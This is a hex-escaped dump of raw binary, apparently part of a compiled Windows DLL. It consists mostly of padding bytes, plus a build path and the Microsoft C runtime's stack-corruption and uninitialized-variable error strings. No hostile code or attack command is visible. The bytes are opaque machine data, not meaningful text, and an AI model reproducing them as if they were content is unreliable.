CC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA0\x13\x01\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xD2\xD9\x99\x4A\x00\x00\x00\x00\x02\x00\x00\x00\x80\x00\x00\x00\x48\x5F\x01\x00\x48\x47\x00\x00\x00\x00\x00\x00\x66\x3A\x5C\x64\x64\x5C\x76\x63\x74\x6F\x6F\x6C\x73\x5C\x63\x72\x74\x5F\x62\x6C\x64\x5C\x73\x65\x6C\x66\x5F\x78\x38\x36\x5C\x63\x72\x74\x5C\x73\x72\x63\x5C\x63\x72\x74\x64\x6C\x6C\x2E\x63\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x53\x74\x61\x63\x6B\x20\x61\x72\x6F\x75\x6E\x64\x20\x5F\x61\x6C\x6C\x6F\x63\x61\x20\x63\x6F\x72\x72\x75\x70\x74\x65\x64\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4C\x6F\x63\x61\x6C\x20\x76\x61\x72\x69\x61\x62\x6C\x65\x20\x75\x73\x65\x64\x20\x62\x65\x66\x6F\x72\x65\x20\x69\x6E\x69\x74\x69\x61\x6C\x69\x7A\x61\x74\x69\x6F\x6E\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x53\x74\x61\x63\x6B\x20\x6D\x65\x6D\x6F\x72\x79\x20\x63\x6F\x72\x72\x75\x70\x74\x69\x6F\x6E\x00\x00\x00\x00\x00\x43\x61\x73\x74\x20\x74\x6F\x20\x73\x6D\x61\x6C\x6C\x65\x72\x20\x74\x79\x70\x65\x20\x63\x61\x75\x73\x69\x6E\x67\x20\x6C\x6F\x73\x73\x20\x6F\x66\x20\x64\x61\x74\x61\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x53\x74\x61\x63\x6B\x20\x70\x6F\x69\x6E\x74\x65\x72\x20\x63\x6F\x72\x72\x75\x70\x74\x69\x6F\x6E\x00\x00\x00\x00\x00\x00\x00\x00\x28\x56\x01\x10\xF4\x55\x01\x10\xD8\x55\x01\x10\xA4\x55\x01\x10\x7C\x55\x01\x10\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x55\x6E\x6B\x6E\x6F\x77\x6E\x20\x52\x75\x6E\x74\x69\x6D\x65\x20\x43\x68\x65\x63\x6B\x20\x45\x72\x72\x6F\x72\x0A\x0D\x00\x00\x00\x00\x00\x00\x00\x53\x74\x61\x63\x6B\x20\x6D\x65\x6D\x6F\x72\x79\x20\x61\x72\x6F\x75\x6E\x64\x20\x5F\x61\x6C\x6C\x6F\x63\x61\x20\x77\x61\x73\x20\x63\x6F\x72\x72\x75\x70\x74\x65\x64\x0A\x0D\x00\x00\x00\x00\x00\x00\x00\x00\x00\x41\x20\x6C\x6F\x63\x61\x6C\x20\x76\x61\x72\x69\x61\x62\x6C\x65\x20\x77\x61\x73\x20\x75\x73\x65\x64\x20\x62\x65\x66\x6F\x72\x65\x20\x69\x74\x20\x77\x61\x73\x20\x69\x6E\x69\x74\x69\x61\x6C\x69\x7A\x65\x64\x0A\x0D\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x53\x74\x61\x63\x6B\x20\x6D\x65\x6D\x6F\x72\x79\x20\x77\x61\x73\x20\x63\x6F\x72\x72\x75\x70\x74\x65\x64\x0A\x0D\x00\x00\x00\x00\x00\x00\x00\x00\x41\x20\x63\x61\x73\x74\x20\x74\x6F\x20\x61\x20\x73\x6D\x61\x6C\x6C\x65\x72\x20\x64\x61\x74\x61\x20\x74\x79\x70\x65\x20\x68\x61\x73\x20\x63\x61\x75\x73\x65\x64\x20\x61\x20\x6C\x6F\x73\x73\x20\x6F\x66\x20\x64\x61\x74\x61\x2E\x20\x20\x49\x66\x20\x74\x68\x69\x73\x20\x77\x61\x73\x20\x69\x6E\x74\x65\x6E\x74\x69\x6F\x6E\x61\x6C\x2C\x20\x79\x6F\x75\x20\x73\x68\x6F\x75\x6C\x64\x20\x6D\x61\x73\x6B\x20\x74\x68\x65\x20\x73\x6F\x75\x72\x63\x65\x20\x6F\x66\x20\x74\x68\x65\x20\x63\x61\x73\x74\x20\x77\x69\x74\x68\x20\x74\x68\x65\x20\x61\x70\x70\x72\x6F\x70\x72\x69\x61\x74\x65\x20\x62\x69\x74\x6D\x61\x73\x6B\x2E\x20\x20\x46\x6F\x72\x20\x65\x78\x61\x6D\x70\x6C\x65\x3A\x20\x20\x0A\x0D\x09\x63\x68\x61\x72\x20\x63\x20\x3D\x20\x28\x69\x20\x26\x20\x30\x78\x46\x46\x29\x3B\x0A\x0D\x43\x68\x61\x6E\x67\x69\x6E\x67\x20\x74\x68\x65\x20\x63\x6F\x64\x65\x20\x69\x6E\x20\x74\x68\x69\x73\x20\x77\x61\x79\x20\x77\x69\x6C\x6C\x20\x6E\x6F\x74\x20\x61\x66\x66\x65\x63\x74\x20\x74\x68\x65\x20\x71\x75\x61\x6C\x69\x74\x79\x20\x6F\x66\x20\x74\x68\x65\x20\x72\x65\x73\x75\x6C\x74\x69\x6E\x67\x20\x6F\x70\x74\x69\x6D\x69\x7A\x65\x64\x20\x63\x6F\x64\x65\x2E\x0A\x0D\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x